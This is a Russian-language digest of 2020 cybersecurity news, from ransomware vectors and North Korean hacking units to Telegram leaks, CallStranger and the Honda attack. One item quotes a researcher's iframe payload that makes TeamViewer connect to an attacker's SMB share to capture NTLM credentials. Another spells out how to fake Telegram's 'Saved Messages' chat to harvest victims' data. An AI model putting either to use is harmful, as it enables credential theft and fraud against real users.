Safety corp.

Большинство российских госсайтов делятся данными граждан с посторонними

Специалисты ОД «Информация для всех» изучили практики российских государственных сайтов, чтобы понять, насколько владельцы ресурсов федеральных органов власти и регуляторов обеспечили защиту от XSS-уязвимостей и стороннего кода. Результаты, конечно, вряд ли смогут порадовать граждан, регулярно доверяющих свои данные таким госсайтам. Это уже второе исследование подобного рода — в 2015 году эксперты представили отчёт «Индекса XSS-безопасности госсайтов». Тогда стало понятно, что большинство подобных ресурсов не отвечает элементарным нормам безопасности. Прежде всего, исследователи отметили уязвимости межсайтового скриптинга (XSS), а также возможность утечки данных посетителей в руки третьих лиц. Спустя пять лет специалисты решили повторить эксперимент и проанализировать (PDF) государственные веб-сайты повторно. За это время число госресурсов, не загружающих код со сторонних сайтов выросло с 7 до 8. Количество источников загрузки сторонних ресурсов при этом сократилось — с 55 до 52. Другими словами, никаких серьёзных изменений в практиках администраторов государственных сайтов не произошло. Большая часть до сих пор может делиться данными посетителей с посторонними, а также безответственно относится к наличию чужого кода на своих страницах.

Операторы шифровальщиков любят баги в VPN, но RDP держит первое место


В первой половине 2020 года часть киберпреступных группировок, распространяющих программы-вымогатели, эксплуатировали уязвимости в VPN-сервисах Citrix и Pulse Secure. Однако большинство атак шифровальщиков увенчались успехом благодаря скомпрометированным RDP-точкам. В целом корпоративный сектор серьёзно пострадал от вымогателей в первой половине 2020 года. Анализируя подобные кампании, эксперты выявили несколько рабочих и излюбленных злоумышленниками векторов атаки. В тройку вошли незащищённые конечные точки RDP, фишинг посредством электронной почты и корпоративные VPN-сервисы, в которых тоже часто находят уязвимости. Первое место уверенно держит RDP. К такому заключению пришли специалисты сразу нескольких серьёзных компаний: Coveware, Emsisoft и Recorded Future.

Основная причина популярности RDP у преступников, по мнению экспертов, объясняется переходом от атак обычных пользователей к серьёзным операциям против корпоративного сектора.

Армия США впервые представила широкой публике руководство для военнослужащих по тактикам Корейской народной армии.

Киберармия КНДР насчитывает как минимум 6 тыс. хакеров и специалистов в области радиоэлектронной борьбы, и многие из них работают за пределами страны. Об этом сообщается в опубликованном в прошлом месяце отчете Армии США "Тактики Северной Кореи" (North Korean Tactics). Этот отчет представляет собой пособие для американских военнослужащих, и в открытом доступе публикуется впервые.

332-страничный документ содержит большой объем ценной информации о Корейской народной армии (КНА), в том числе о ее тактиках, оружии, структуре руководства, типах войск, логистике и возможностях в сфере радиоэлектронной борьбы. Кроме того, в нем представлены некоторые сведения о секретном хакерском подразделении КНА.

Согласно отчету, за большую часть военно-кибернетических операций отвечает так называемое "Бюро 121", являющееся подразделением Разведывательного Управления Генштаба КНА. За последние несколько лет оно существенно разрослось, так как Пхеньян расширил свои операции в киберпространстве. Так, если в 2010 году "Бюро 121" насчитывало 1 тыс. отлично подготовленных хакеров, то в настоящее время их число перевалило за 6 тыс.

"Бюро 121" состоит из четырех основных подразделений. Три из них ответственны за операции в киберпространстве и одно - за радиоэлектронную борьбу.

Первое подразделение называется Andariel Group и представляет собой APT-группу (группу хакеров, работающих на правительство). В Andariel Group входит 1,6 тыс. человек, "чья миссия состоит в сборе информации путем проведения разведки компьютерных систем противника и создания начальной оценки уязвимостей", говорится в отчете. Именно Andariel Group создает карту сетей противника для дальнейших кибератак.

Второе подразделение представляет собой APT-группу под названием Bluenoroff Group. Она состоит из 1,7 тыс. хакеров, "чья миссия заключается в проведении финансовых киберпреступлений". Тактикой Bluenoroff Group является оценка и эксплуатация уязвимостей в сети противника в долгосрочной перспективе.

Третье подразделение - это хорошо знакомая ИБ-экспертам APT-группа Lazarus Group. Название Lazarus Group, как правило, является собирательным термином, которым ИБ-специалисты обозначают все киберпреступные операции КНДР. Точное число участников этой группы неизвестно.

Четвертое подразделение, отвечающее за радиоэлектронную борьбу, - Electronic Warfare Jamming Regiment. Оно состоит из трех военных батальонов и насчитывает 2-3 тыс. военнослужащих. Это подразделенение является классическим военным формированием, а его операции проводятся с трех военных баз на территории КНДР.

В отличие от Warfare Jamming Regiment, три хакерских подразделения "Бюро 121" организованы более свободно, а их служащим разрешено ездить за границу и проводить свои операции оттуда. В частности, многие операции северокорейских хакеров проводятся с территории Беларуси, России, Китая, Индии и Малайзии. За рубежом хакеры регистрируют фирмы-пустышки, служащие прикрытием для вредоносной серверной инфраструктуры и операций по отмыванию денег.

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Опасная уязвимость в TeamViewer для Windows может привести к взлому паролей пользователей и, как следствие, к компрометации всей операционной системы. Получившую идентификатор CVE-2020-13699 брешь можно использовать удалённо. Специалисты советуют особо присмотреться к этой проблеме безопасности, поскольку с приходом COVID-19 TeamViewer для удалённого доступа стали использовать гораздо чаще. CVE-2020-13699 представляет собой путь поиска или элемент без кавычек. Другими словами, приложение некорректно обрабатывает кастомные URI-хендлеры. Это может привести к эксплуатации в момент посещения вредоносного сайта. «Атакующий может встроить вредоносный iframe в веб-сайт со специальным URL — iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'. Именно эта ссылка запустит десктопный Windows-клиент TeamViewer и заставит его открыть удалённую SMB-шару», — объяснил Джеффри Хофманн, специалист в области кибербезопасности из компании Praetorian. «Windows при этом осуществит NTLM-аутентификацию и этот запрос злоумышленник может использовать для выполнения кода».

Мошенники научились воровать информацию через подделку «Избранного» (Saved Messages) в Telegram. Этим чатом люди пользуются как перепиской с самим собой, и могут сохранять там важные и конфиденциальные сведения.

Для этого нужно создать новый аккаунт под названием Saved Messages, поставить на аватар иконку закладки, напоминающую оригинальную, а затем написать жертве любое сообщение и сразу же удалить его. Таким образом поддельный профиль попадает в начало списка контактов.

Далее ничего не подозревающий пользователь, считая, что это приватный диалог, сохраняет в него какую-нибудь важную или не очень информацию.

Пока команда мессенджера Telegram никак не реагирует на ситуацию. При этом хитрый способ берут на вооружение как шутники, так и настоящие мошенники.

Функция «Избранное» в Telegram позволяет сохранять сообщения из любого чата в личную папку. Также фишка подходит для переноса файлов между устройствами, формирования разнообразных списков, хранения ссылок, контактов и сообщений из чатов и прочей информации.

Хакеры взломали военных США через Word-документы

Киберпреступники из Северной Кореи атаковали американские оборонные предприятия. Для доступа в локальную сеть злоумышленники отправляли сотрудникам фишинговые письма, содержащие поддельные документы с предложениями о работе.

Файл .docx представлял собой ZIP-файл из нескольких частей. Используя технику внедрения шаблона, злоумышленники помещали ссылку в файл .XML, по которой загружались файлы шаблонов (DOTM) с удаленного сервера. Некоторые из них переименовывались в файлы JPEG, чтобы избежать подозрений. Файлы шаблонов содержали код макроса, который и загружал DLL-имплант в систему жертвы, открывая хакерам доступ в компьютерную сеть.

Оставаться незамеченными долгое время хакерам помогало использование одного и того же user-agent , что и у настоящего пользователя, что позволяло избежать обнаружения и замаскировать трафик.

Компания "Интернет-Розыск" закончила разработку альфа-версии продукта, предназначенного для установления личности пользователя мессенджера Telegram.

Продукт "Телеграм-Деанонимайзер" позволяет:

собирать неизменяемые данные пользователей мессенджера;
устанавливать личности пользователей по всему миру;
собирать данные о примерном местоположении и языковой группе пользователя мессенджера;
проверять активность и принадлежность номера телефона, использованного для регистрации аккаунта Телеграм.


Продукт "Телеграм-Деанонимайзер" собирает информацию:
1. Номер мобильного телефона пользователя

активность номера телефона
примерное местоположение мобильного устройства
вероятный пользователь мобильного телефона

Имя пользователя, указанное в мессенджере
Фамилия пользователя, указанная в мессенджере
ID, неизменяемый идентификатор пользователя
Логин, юзернейм, псевдоним пользователя
Используемое устройство (модель, операционная система)
Местоположение устройства (по внешнему IP-адресу)
Системный язык устройства (языковая группа пользователя

Защита фотографий от систем распознавания лиц

Современные системы распознавания лиц представляют большую угрозу личной приватности. Уже сейчас такие системы ежедневно сканируют миллионы лиц в Китае, Великобритании и России без их согласия. Исследователи придумали алгоритм, который делает незаметные попиксельные изменения в фотографии, делая ее бесполезной для систем распознавания лиц.

После обработки вы можете использовать фотографии как угодно — публиковать в социальных сетях, передавать друзьям или распечатывать на бумаге. В любом случае, для распознавания лиц они уже бесполезны. Сжатие фотографий и применение любых графических фильтров не снимают защиту, поскольку клоакинг происходит на уровне пикселей, и не стирается в растровом редакторе.

Алгоритм был протестирован и показал эффективность 100% против самых известных моделей распознавания Microsoft Azure Face API, Amazon Rekognition и Face++. Программа имеет открытый исходный код и ее можно установить на Windows, Linux и Mac.

Хакеры могут удаленно воспламенить смартфон на зарядке

Китайские исследователи рассказали о форме атаки BadPower, принцип которой заключается в модификации прошивки устройств для быстрой зарядки, что может привести к воспламенению подключённых девайсов.

Подобные устройства выглядят как обычные зарядки, однако могут взаимодействовать с подключёнными девайсами, «согласовывая» скорость зарядки. Если заряжаемое устройство не поддерживает технологию быстрой зарядки, прошивка понижает мощность, а если же допустимо заряжать девайс в ускоренном режиме, повышает.

Подключившись к устройству быстрой зарядки с помощью ноутбука или смартфона, злоумышленник может за несколько секунд загрузить вредоносный код в прошивку, а затем удаленно модифицировать параметры зарядки значительно увеличивая мощность, что приведёт к повреждению подключённого девайса: компоненты могут плавиться, деформироваться и даже воспламеняться.

В России разработана система слежки за covid больными (не прошло и пол года)

Минкомсвязь разработала регламент отслеживания контактов заразившихся коронавирусом на основе геолокации и данных мобильных операторов.

В документе отмечается, что за основу будут браться данные Минздрава о номере телефона больного COVID-19. После этого специальные алгоритмы составят список людей, которые находились вместе с больным, а также тех, кто контактировал с зараженным посредством мобильной связи.

Этот перечень будет уточняться «с учетом данных о времени совместного нахождения абонентов и особенностей перемещения в течение наблюдаемого периода».

«В результате формируются списки номеров абонентов, которые были подвержены риску заражения COVID-19 в ходе непосредственного общения с заболевшим. Полученные данные централизуются на информационных ресурсах Минкомсвязи России и направляются в оперативные штабы субъектов Российской Федерации, Росгвардию, МВД России и Минздрав России», — говорится в документе .

Как отметили в Кремле, отслеживание по данным сотовых телефонов тех, кто контактировал с больными заболевшими, не нарушает их права 🤣 (ну хорошо , можно не волноваться тогда :)

Около 300 системных файлов Windows 10 уязвимы перед DLL hijacking


Простейшего VBScript порой достаточно, чтобы обойти контроль учётных записей (UAC) в Windows 10 и получить права администратора. Новый отчёт британского исследователя проливает свет на новую проблему безопасности Windows 10. Витце Беукема опубликовал результаты своего исследования, согласно которым около 300 исполняемых системных файлов Windows 10 уязвимы перед перехватом DLL (DLL hijacking). «Оказалось, что почти 300 исполняемых файлов Windows 10, расположенных в директории System32, уязвимы перед техникой атаки, известной как "перехват DLL"», — пишет специалист. «Знали ли вы, что с помощью простого скрипта VBScript системные файлы можно использовать для обхода контроля учётных записей и повышения прав в операционной системе». Другими словами, потенциальный атакующий может «заставить» системный файл Windows загрузить произвольную библиотеку, которая будет выполнять его команды. Если злоумышленник окажется подготовленным, этот вектор станет одной из ступеней его операции. Вариации DLL hijacking Беукема подробно расписал в своём блоге. Эксперт продемонстрировал один из возможных сценариев атаки, используя файлы из директории C:\Windows\System32 и операционную систему Windows 10 версии 1909. Полный список из 287 исполняемых файлов и 263 уникальных DLL Беукема опубликовал на GitHub.

Утекла база 40 миллионов пользователей Telegram

Вчера в публичный доступ утекли данные более чем 40 миллионов пользователей Telegram.

Среди данных есть:
— Username
— ID
— Имя
— Номер телефона

Минимум 12 млн записей принадлежат российским пользователям. Судя по всему утечка произошла давно, а в общий доступ база попала только недавно.

Рекомендуем отключить в настройках Telegram возможность найти аккаунт по номеру телефона, а также включить отображение номера телефона только для контактов.

Долгожданный VPN от Mozilla выйдет в ближайшие недели


Mozilla рассказала о планах в отношении собственного VPN-сервиса. По словам корпорации, долгожданная разработка будет доступна этим летом — «в течение следующих нескольких недель». Помимо приблизительной даты выхода, стало известно и о переименовании нового продукта. Раньше Mozilla называла сервис Firefox Private Network, теперь короче и проще — Mozilla VPN.

Смена имени продиктована развитием проекта из простого расширения для браузера Firefox в полноценный VPN для всего устройства. На сегодняшний день известно, что установить Mozilla VPN смогут пользователи Windows 10, Chromebooks, Android и iOS. Бета-тестеры также просят сделать версию для macOS. Разработчики в ответ заявили, что она в планах, как и приложение для Linux

Сначала Mozilla VPN выйдет для граждан США, однако к концу года корпорация обещает «подключить» и другие страны. Защитить до пяти устройств на Windows, Android и iOS пользователи смогут за $4,99 в месяц.

Уязвимость CallStranger позволяет перехватывать контроль над IoT-устройствами


ИБ-специалист Юнус Чадырчи (Yunus Çadirci­) из компании Ernst & Young опубликовал PoC-код для эксплуатации новой уязвимости, получившей название CallStranger ( CVE-2020-12695 ), в наборе сетевых протоколов Universal Plug and Play (UPnP). Эксплуатация уязвимости позволяет злоумышленникам перехватывать контроль над различными IoT-устройствами, использовать их для осуществления DDoS-атак, а также для обхода защитных решений, сканирования внутренней сети жертвы и хищения данных.

Набор сетевых протоколов UPnP позволяет устройствам видеть друг друга в локальных сетях, а затем устанавливать соединение, обмениваться данными, настройками и пр.

По словам эксперта, CallStranger имеет сходство с SSRF-уязвимостью (Server-Side Request Forgery): злоумышленник может отправлять на удаленное устройство TCP-пакеты, содержащие измененное значение параметра callback в заголовке для функции SUBSCRIBE. Измененный заголовок может быть использован для атак на любые устройства, подключенные к интернету и поддерживающие UPnP, включая камеры наблюдения, видеорегистраторы, принтеры, маршрутизаторы и пр.

Проблема затрагивает ПК под управлением Windows, игровые приставки, телевизоры и маршрутизаторы производства Asus, Belkin, Broadcom, Cisco, Dell, D-Link, Huawei, Netgear, Samsung, TP-Link, ZTE и пр.

Злоумышленники могут использовать CallStranger для обхода защитных решений и межсетевых экранов, а также сканирования внутренних сетей компаний. Эксплуатация проблемы также позволяет осуществлять DDoS-атаки и похищать данные.

Исследователь уведомил о проблеме организацию Open Connectivity Foundation, занимающуюся разработкой стандартов спецификации и обеспечением сертификации IoT-устройств. Организация уже обновила спецификации для протоколов UPnP. Обновления были выпущены 17 апреля 2020 года, но не все поставщики успели применить исправления. По результатам поискового запроса Shodan, в настоящее время в Сети доступно около 5,4 млн уязвимых устройств с поддержкой UPnP.

Кибератака парализовала сборку автомобилей Honda по всему миру


С понедельника, 8 июня, японский автопроизводитель вынужден был прекратить работу своих заводов по всему миру, а также устроить вынужденный выходной для сотрудников в офисах из-за масштабной кибератаки, которая затронула компьютерные и телефонные сети концерна Honda. Восстановить работоспособность IT-инфраструктуры и вернуться к обычному графику работы в компании планируют в течение дня или как минимум до конца текущей недели.

В Honda подчеркнули, что нет никакой утечки информации, а просто нарушена работа сетей связи и компьютерных сетей. Из-за невозможности работать в привычном режиме сотрудники ряда офисов отправились по домам, а также были остановлены производственные предприятия в Северной Америке, Турции, Италии и Японии. Ряд заводов проблемы с кибератакой не затронули, поскольку там выпуск автомобилей был прекращён ранее из-за пандемии коронавируса.

Японский автопроизводитель не уточнил, какого рода проблемы возникли, но, по информации издания Car Dealer, речь идёт о заражении компьютеров программой-вымогателем Ekans, которая шифрует данные и требует выкуп за возвращение доступа к ним. О том, каким образом заразились компьютеры автомобильного гиганта, не сообщается.